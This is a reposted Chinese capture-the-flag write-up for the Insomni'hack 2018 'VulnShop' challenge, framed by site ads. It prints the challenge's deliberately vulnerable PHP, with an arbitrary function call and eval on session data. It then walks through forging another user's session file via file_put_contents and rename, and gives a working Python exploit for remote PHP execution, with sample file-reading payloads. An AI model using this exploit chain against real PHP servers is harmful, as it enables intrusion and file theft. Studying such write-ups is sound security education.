Insomni'hack teaser 2018-VulnShop-writeup

栏目: Python · 发布时间: 7年前

内容简介:Insomni'hack teaser 2018-VulnShop-writeup

Insomni’hack teaser 2018-VulnShop-writeup

session文件

题目

We're preparing a website for selling some important vulnerabilities in the future. You can browse some static pages on it, waiting for the official release.

http://vulnshop.teaser.insomnihack.ch

Important : you don't need to use automated scanners or bruteforce for this challenge, and using some will result for your ip to be banned. Go on IRC to ask for being unbanned.

Solution

题目提供了 源码 ,和 phpinfo

源码主要部分如下:

<?php if(isset($_GET['hl'])){ highlight_file(__FILE__); exit; }
    error_reporting(0); session_start();
    // Anti XSS filter
    $_REQUEST = array_map("strip_tags", $_REQUEST);
    // For later, when we will store infos about visitors.
    chdir("tmp");
?>
<?php
        switch($_GET['page']) {
            case 'default':
            default:
                echo "<p>Welcome to our website about infosec. It's still under construction, but you can begin to browse some pages!</p>";
                break;
            case 'introduction':
                echo "<p>Our website will introduce some new vulnerabilities. Let's check it out later!</p>";
                break;
            case 'privacy':
                echo "<p>This website is unbreakable, so don't worry when contacting us about some new vulnerabilities!</p>";
                break;
            case 'contactus':
                echo "<p>You can't contact us for the moment, but it will be available later.</p>";
                $_SESSION['challenge'] = rand(100000,999999);
                break;
            case 'captcha':
                if(isset($_SESSION['challenge'])) echo $_SESSION['challenge'];
                // Will make an image later
				touch($_SESSION['challenge']);
                break;
            case 'captcha-verify':
// verification functions take a file for later, when we'll provide more way of verification
                function verifyFromString($file, $response){
                    if($_SESSION['challenge'] === $response) return true;
                    else return false;
                }

                // Captcha from math op
                function verifyFromMath($file, $response){
                    if(eval("return ".$_SESSION['challenge']." ;") === $response) return true;
                    else return false;
                }
                if(isset($_REQUEST['answer']) && isset($_REQUEST['method']) && function_exists($_REQUEST['method'])){
                    $_REQUEST['method']("./".$_SESSION['challenge'], $_REQUEST['answer']);
                }
                break;

        }
?>

第一部分的 php 代码,对于接收进来的参数,都会进行strip_tags,将其中的html、php标签去除,同时开始了一个 session_start

第二部分中有几个功能:

  1. page=contactus 时,会随机产生一个变量 $_SESSION['challenge']
  2. page=captcha 时,若之前已经访问过contactus,也即对应的变量 $_SESSION['challenge'] 存在,则echo出来,并且创建一个以变量 $_SESSION['challenge'] 值为名字的文件,后面我简称用户的challenge文件。
  3. page=captcha-verify 时,通过传入对应的参数,会执行如下代码:
    $_REQUEST['method']("./".$_SESSION['challenge'], $_REQUEST['answer'])
    

同时在这个case中,还定义了两个函数,其中verifyFromMath()中出现了熟悉的eval。

通过基本的尝试,可以发现:

  1. 由于strip_tags的存在,无法直接传入包含 <?php 等的php代码
  2. tmp目录不可读,通过touch生成的文件也无法访问。
  3. 网站根目录(即tmp目录的上一级目录)不可写
    Insomni'hack teaser 2018-VulnShop-writeup

考虑题目还给了phpinfo,经过查看,我们可以发现session文件的保存位置。

Insomni'hack teaser 2018-VulnShop-writeup

我们知道在php中,通过查看cookie可以知道对应的PHPSESSID,比如 PHPSESSID=123456 ,则在对应的session文件名即为 sess_123465 。以下是我本地测试用例:

Insomni'hack teaser 2018-VulnShop-writeup

所以考虑一个场景:

  1. 我们生成两个用户,也即两个session,对应着两个PHPSESSID。
  2. 利用用户1和captcha-verify功能,将php语句写入到用户2的session文件中,要注意格式,修改用户2对应的 $_SESSION['challenge']
  3. 利用用户2和verifyFromMath,执行 eval("return ".$_SESSION['challenge']." ;") ,从而执行我们的php代码。

第一步,两个用户。因此我们要分两次的分别访问contactus和captcha,记录下他们对应的PHPSESSID。

第二步中,先来看看session文件的格式。由于我们要写入的是php语句,因此格式如下:

challenge|s:7:"chybeta";

其中 s 表示字符串,后面的数字7为长度,引号中的内容是对应的php语句,其余的部分不变,上述示例对应的 $_SESSION['challenge'] 即为 chybeta

接着考虑如何把这串内容写入到用户2的session文件中。源码中有这段代码:

$_REQUEST['method']("./".$_SESSION['challenge'], $_REQUEST['answer'])

因此我们先往用户1的challenge文件中写入对应php语句,即:

$_REQUEST['method'] = file_put_contents
$_REQUEST['answer'] = fake-session-content

file_put_contents("./".$_SESSION['challenge'], fake-session-content)

这样在tmp目录下就生成了用户1对应的challenge文件,其内容为伪造的用户2的session文件内容。

接着覆盖:

$_REQUEST['method'] = rename
$_REQUEST['answer'] = path_to_user2_session

rename("./".$_SESSION['challenge'], path_to_user2_session)

path to_user2_session是指用户2的session文件的路径,从phpinfo,我们知道session路径为`/var/lib/php/sessions/sess [对应的PHPSESSID]`

注意在整个第二步的操作过程中,我们没有关注用户1的session,它生成的challenge文件仅作为一个中转站。

第三步,执行php代码,注意这个时候用户2的session文件内容已经被改变了。这个时候需要进入verifyFromMath功能:

$_REQUEST['method'] = verifyFromMath
$_REQUEST['answer'] = xxx

verifyFromMath("./".$_SESSION['challenge'], xxx)

	=>  eval("return ".$_SESSION['challenge']." ;")

利用exp:

import requests
import re

def filePutContent(cookie,payload):
	params = {
		'page':'captcha-verify',
		'answer': payload,
		'method':'file_put_contents'
	}
	r = requests.get(url,params=params,cookies=cookie)
	print('[*] file_put_contents ok.')

def rename(r1_cookie,r2_phpsessid,session_path):
	cookie2_session_file = session_path + "sess_" + r2_phpsessid
	print('[*] r2 session file path: ' + cookie2_session_file)
	params = {
		'page':'captcha-verify',
		'answer': cookie2_session_file,
		'method':'rename'
	}
	r = requests.get(url,params=params,cookies=r1_cookies)
	print('[*] rename ok.')

def getResult(cookie):
	verifyurl = url + "?page=captcha-verify"
	postdata = {
		"method":"verifyFromMath",
		"answer":"a"
	}
	p = re.compile("(?<=<div class=\"content\">)(.*?)(?=</div>)",re.S)
	r = requests.post(verifyurl,data=postdata,cookies=cookie)
	result = re.search(p,r.text).group(0)
	return result.strip()

url = "http://vulnshop.teaser.insomnihack.ch/index.php"
session_path = "/var/lib/php/sessions/"

contactus = {
	'page':'contactus'
}
captcha = {
	'page':'captcha'
}

r1 = requests.get(url,params=contactus)
r1_cookies = r1.cookies
r1_phpsessid = r1.cookies['PHPSESSID']
print('[*] r1 PHPSESSID: ' + r1_phpsessid)

r2 = requests.get(url,params=contactus)
r2_cookies = r2.cookies
r2_phpsessid = r2.cookies['PHPSESSID']
print('[*] r2 PHPSESSID: ' + r2_phpsessid)

while True:
	payload = input("[*] php code:")
	length = len(payload)
	content = 'challenge|s:%d:"%s";' % (length,payload)
	filePutContent(r1_cookies,content)
	rename(r1_cookies,r2_phpsessid,session_path)
	print('[*] eval result:' + getResult(r2_cookies))

php code:

print_r(scandir('/'));

Insomni'hack teaser 2018-VulnShop-writeup

php code:

print_r(file_get_contents('/flag'));

Insomni'hack teaser 2018-VulnShop-writeup

flag:

INS{4rb1tr4ry_func_c4ll_is_n0t_s0_fun}

以上所述就是小编给大家介绍的《Insomni'hack teaser 2018-VulnShop-writeup》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

高性能网站建设进阶指南

高性能网站建设进阶指南

Steve Souders / 口碑网前端团队 / 电子工业出版社 / 2010年4月 / 49.80元

性能是任何一个网站成功的关键,然而,如今日益丰富的内容和大量使用Ajax的Web应用程序已迫使浏览器达到其处理能力的极限。Steve Souders是Google Web性能布道者和前Yahoo!首席性能工程师,他在本书中提供了宝贵的技术来帮助你优化网站性能。 Souders的上一本畅销书《高性能网站建设指南》(High Performance Web Sites)震惊了Web开发界,它揭示......一起来看看 《高性能网站建设进阶指南》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

URL 编码/解码
URL 编码/解码

URL 编码/解码